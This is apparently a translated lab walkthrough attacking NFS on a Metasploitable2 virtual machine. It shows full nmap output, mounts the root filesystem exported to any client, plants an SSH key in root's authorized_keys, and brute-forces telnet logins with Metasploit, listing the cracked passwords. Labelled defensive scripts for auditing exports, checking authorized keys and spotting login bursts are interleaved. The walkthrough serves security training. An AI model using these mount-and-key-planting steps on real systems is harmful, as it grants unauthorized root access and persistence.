In this post we are going to attack NFS (Network File System) services.
This service lets files, CD-ROM/DVD drives and so on that live on a server be shared remotely with any client.
The default port is 2049 and the transport can be either TCP or UDP.
The RFCs for this service are 1094, 1813 and 3530 (versions 2, 3 and 4 respectively).
Let's bring up the scan again:
Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-01 11:43 CEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating ARP Ping Scan at 11:43
Scanning 192.168.1.131 [1 port]
Completed ARP Ping Scan at 11:43, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:43
Completed Parallel DNS resolution of 1 host. at 11:43, 0.15s elapsed
Initiating SYN Stealth Scan at 11:43
Scanning 192.168.1.131 [1000 ports]
Discovered open port 21/tcp on 192.168.1.131
Discovered open port 139/tcp on 192.168.1.131
Discovered open port 111/tcp on 192.168.1.131
Discovered open port 5900/tcp on 192.168.1.131
Discovered open port 22/tcp on 192.168.1.131
Discovered open port 445/tcp on 192.168.1.131
Discovered open port 80/tcp on 192.168.1.131
Discovered open port 25/tcp on 192.168.1.131
Discovered open port 23/tcp on 192.168.1.131
Discovered open port 53/tcp on 192.168.1.131
Discovered open port 3306/tcp on 192.168.1.131
Discovered open port 8009/tcp on 192.168.1.131
Discovered open port 2049/tcp on 192.168.1.131
Discovered open port 1524/tcp on 192.168.1.131
Discovered open port 512/tcp on 192.168.1.131
Discovered open port 6667/tcp on 192.168.1.131
Discovered open port 6000/tcp on 192.168.1.131
Discovered open port 513/tcp on 192.168.1.131
Discovered open port 8180/tcp on 192.168.1.131
Discovered open port 2121/tcp on 192.168.1.131
Discovered open port 514/tcp on 192.168.1.131
Discovered open port 5432/tcp on 192.168.1.131
Discovered open port 1099/tcp on 192.168.1.131
Completed SYN Stealth Scan at 11:43, 0.15s elapsed (1000 total ports)
Initiating Service scan at 11:43
Scanning 23 services on 192.168.1.131
Completed Service scan at 11:43, 11.31s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.131
NSE: Script scanning 192.168.1.131.
Initiating NSE at 11:43
Completed NSE at 11:44, 14.52s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Nmap scan report for 192.168.1.131
Host is up (0.00059s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2016-07-01T09:43:21+00:00; -35s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2         111/tcp     rpcbind
|   100000  2         111/udp     rpcbind
|   100003  2,3,4     2049/tcp    nfs
|   100003  2,3,4     2049/udp    nfs
|   100005  1,2,3     41183/tcp   mountd
|   100005  1,2,3     49986/udp   mountd
|   100021  1,3,4     41855/udp   nlockmgr
|   100021  1,3,4     54128/tcp   nlockmgr
|   100024  1         42483/tcp   status
|_  100024  1         49051/udp   status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
| rpcinfo:
|   program version   port/proto  service
|   100000  2         111/tcp     rpcbind
|   100000  2         111/udp     rpcbind
|   100003  2,3,4     2049/tcp    nfs
|   100003  2,3,4     2049/udp    nfs
|   100005  1,2,3     41183/tcp   mountd
|   100005  1,2,3     49986/udp   mountd
|   100021  1,3,4     41855/udp   nlockmgr
|   100021  1,3,4     54128/tcp   nlockmgr
|   100024  1         42483/tcp   status
|_  100024  1         49051/udp   status
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info:
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: 7HD[!-`|m0EJ$q2@-^sH
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info:
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN
|   uptime: 0 days, 0:04:04
|   source ident: nmap
|   source host: 5AD5FCE2.78DED367.FFFA6D49.IP
|_  error: Closing Link: gjtkunzrr[192.168.1.134] (Quit: gjtkunzrr)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:67:3E:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.102 days (since Fri Feb 20 08:16:41 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2016-07-01T05:43:21-04:00

TRACEROUTE
HOP RTT      ADDRESS
1   0.59 ms  192.168.1.131

NSE: Script Post-scanning.
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.64 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
Let's run the following:
rpcinfo 192.168.1.131
rpcinfo -p 192.168.1.131
Let's see which directory is being exported.
showmount -e 192.168.1.131
The exported directory is the root directory.
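What makes the rest of this walkthrough possible is the server's exports configuration: the root filesystem, offered to any client, with the remote root user not squashed. The following script is an added example, not part of the original post or of Metasploitable, that audits an /etc/exports-style file for exactly those three settings. The exports content and temp file paths are constructed for illustration; the second sample line shows the hardened form (one subnet, read-only, root_squash).

```shell
#!/bin/sh
# Added example, not part of the original post: audit an NFS exports file for
# the settings that let an arbitrary client mount "/" with root rights.
# The exports content and file paths below are constructed for illustration.
set -f   # disable globbing: export specs contain '*' which must stay literal

# Constructed sample. The first line mirrors what showmount reported above
# (root filesystem, any client, remote root not squashed); the second is a
# hardened equivalent restricted to one subnet, read-only, with root_squash.
SAMPLE_EXPORTS='/ *(rw,sync,no_root_squash)
/srv/share 192.168.1.0/24(ro,sync,root_squash)
# comment lines and blank lines are ignored

/home/backup 10.0.0.5(rw,sync,root_squash)'

EXPORTS_FILE=$(mktemp)
printf '%s\n' "$SAMPLE_EXPORTS" > "$EXPORTS_FILE"

# audit_exports_file FILE: print one "RISK <path> <client> <reason>" line
# per risky setting found in an /etc/exports-style file.
audit_exports_file() {
    while read -r path rest; do
        case "$path" in ''|\#*) continue ;; esac      # skip blanks/comments
        for spec in $rest; do                          # one "client(opts)" per spec
            client=${spec%%"("*}                       # text before '(' is the client
            opts=""
            if [ "$client" != "$spec" ]; then
                opts=${spec#*"("}
                opts=${opts%")"}
            fi
            [ "$path" = "/" ] && echo "RISK $path $client exports the root filesystem"
            [ "$client" = "*" ] && echo "RISK $path $client any host may mount it"
            case ",$opts," in
                *,no_root_squash,*) echo "RISK $path $client remote root keeps uid 0 (no_root_squash)" ;;
            esac
        done
    done < "$1"
    return 0
}

# count_risky_exports FILE: number of RISK findings (0 when the file is clean)
count_risky_exports() {
    audit_exports_file "$1" | awk 'END { print NR + 0 }'
}

audit_exports_file "$EXPORTS_FILE"
echo "risky settings: $(count_risky_exports "$EXPORTS_FILE")"
```

Run against the real file with `audit_exports_file /etc/exports`; a clean file produces no RISK lines. The checks are deliberately independent, so a root export that is at least restricted to one host still shows up as a finding.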
Now we generate a new SSH key.
ssh-keygen
We create a temporary directory:
mkdir /tmp/ROOT
(so that we don't run into problems later: right now I am working in the /root directory)
We mount the file system.
mount -t nfs 192.168.1.131:/ /tmp/ROOT/
In case you hadn't noticed, the slash after the colon that follows the IP address is the directory they are sharing with us.
We append the key we just created to the remote file under /:
cat /root/.ssh/id_rsa.pub >> /tmp/ROOT/.ssh/authorized_keys
And we unmount:
umount /tmp/ROOT
A summary of what we have done:
We created a new SSH key and dropped it into the server's root directory, which is exported. That way we can open an SSH session without any trouble.
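From the defender's side, the trace this leaves is an entry in root's authorized_keys that nobody approved. The script below is an added example, not part of the original post, that compares an authorized_keys file against an approved baseline and prints every key whose type and key material are missing from the baseline. The key strings, comments and temp file paths are constructed placeholders, not real key material; it assumes plain "type data comment" entries without leading options such as from=.

```shell
#!/bin/sh
# Added example, not part of the original post: compare an authorized_keys file
# against an approved baseline and report keys that nobody approved, which is
# what the mount-and-append step above leaves behind. Keys and paths below are
# constructed placeholders, not real key material.

BASELINE='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABCONSTRUCTEDKEYONE== admin@workstation'
AUTH_KEYS='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABCONSTRUCTEDKEYONE== admin@workstation
# comment line in authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABCONSTRUCTEDKEYTWO== root@unknown-host'

BASELINE_FILE=$(mktemp)
printf '%s\n' "$BASELINE" > "$BASELINE_FILE"
AUTH_FILE=$(mktemp)
printf '%s\n' "$AUTH_KEYS" > "$AUTH_FILE"

# unexpected_keys BASELINE AUTHORIZED_KEYS: print "type data comment" for every
# key in AUTHORIZED_KEYS whose type+data pair is absent from BASELINE.
# Assumes plain "type data [comment]" entries (no leading options like from=).
unexpected_keys() {
    awk '
        # first file: record approved type+data pairs, comments are ignored
        FILENAME == ARGV[1] {
            if ($1 != "" && $1 !~ /^#/) known[$1 " " $2] = 1
            next
        }
        # second file: report anything not in the approved set
        $1 != "" && $1 !~ /^#/ && !(($1 " " $2) in known) {
            print $1, $2, ($3 == "" ? "(no comment)" : $3)
        }' "$1" "$2"
}

# count_unexpected_keys BASELINE AUTHORIZED_KEYS: number of unapproved entries
count_unexpected_keys() {
    unexpected_keys "$1" "$2" | awk 'END { print NR + 0 }'
}

unexpected_keys "$BASELINE_FILE" "$AUTH_FILE"
```

In practice the baseline lives somewhere the NFS client cannot write (configuration management or a signed copy), and the check runs periodically against /root/.ssh/authorized_keys and every user's authorized_keys; the comment field is ignored on purpose because it is attacker-controlled and proves nothing.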
If we move into the home directory, we can see that there are 4 users: ftp, msfadmin, service and user.
On our machine we create a users file as follows:
ftp
msfadmin
service
user
This will be our user dictionary.
Now, in metasploit, we will try to brute-force the passwords:
use auxiliary/scanner/telnet/telnet_login
And we configure it.
After a long while, the passwords come out:
msfadmin – msfadmin
user – user
service – service
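A dictionary attack over telnet is noisy on the server side: each wrong guess leaves a failed-login record, and a single source trying several usernames in quick succession stands out. The following script is an added example, not part of the original post or of Metasploit, that flags sources with at least a threshold number of failed logins and reports how many distinct usernames each one tried. The log lines are constructed to resemble login(1)/PAM "FAILED LOGIN" messages in auth.log; the exact wording varies by distribution and version, so the regex is an assumption to adapt to your own logs.

```shell
#!/bin/sh
# Added example, not part of the original post: flag sources that rack up
# failed telnet/console logins, the pattern a dictionary attack produces.
# The log lines are constructed to resemble login(1)/PAM "FAILED LOGIN"
# messages in auth.log; exact wording varies by distribution and version.

AUTH_LOG=$(mktemp)
cat > "$AUTH_LOG" <<'EOF'
Jul  1 11:50:01 metasploitable login[4321]: FAILED LOGIN (1) on 'pts/1' from '192.168.1.134' FOR 'ftp', Authentication failure
Jul  1 11:50:02 metasploitable login[4322]: FAILED LOGIN (1) on 'pts/1' from '192.168.1.134' FOR 'msfadmin', Authentication failure
Jul  1 11:50:03 metasploitable login[4323]: FAILED LOGIN (1) on 'pts/1' from '192.168.1.134' FOR 'service', Authentication failure
Jul  1 11:50:04 metasploitable login[4324]: FAILED LOGIN (1) on 'pts/1' from '192.168.1.134' FOR 'user', Authentication failure
Jul  1 11:50:05 metasploitable login[4325]: FAILED LOGIN (2) on 'pts/1' from '192.168.1.134' FOR 'msfadmin', Authentication failure
Jul  1 11:52:10 metasploitable login[4330]: FAILED LOGIN (1) on 'pts/2' from '192.168.1.50' FOR 'admin', Authentication failure
Jul  1 11:52:20 metasploitable login[4330]: LOGIN ON pts/2 BY admin FROM 192.168.1.50
EOF

# flag_login_bursts LOG THRESHOLD: print
# "ALERT <source> attempts=<n> distinct_users=<m>" for every source
# with at least THRESHOLD failed logins in LOG.
flag_login_bursts() {
    awk -v limit="$2" '
        /FAILED LOGIN/ {
            # source address sits between "from '\''" and the next quote
            src = $0; sub(/.*from '\''/, "", src); sub(/'\''.*/, "", src)
            # username sits between "FOR '\''" and the next quote
            usr = $0; sub(/.*FOR '\''/, "", usr); sub(/'\''.*/, "", usr)
            attempts[src]++
            if (!seen[src, usr]++) users[src]++   # count each username once per source
        }
        END {
            for (s in attempts)
                if (attempts[s] >= limit)
                    printf "ALERT %s attempts=%d distinct_users=%d\n", s, attempts[s], users[s]
        }' "$1"
}

flag_login_bursts "$AUTH_LOG" 4
```

With the sample above and a threshold of 4, only 192.168.1.134 is reported (five failures across four usernames); the single typo from 192.168.1.50 followed by a successful login stays quiet. The distinct_users count is the useful second signal: a legitimate user who forgets a password fails on one account, a dictionary run walks through many.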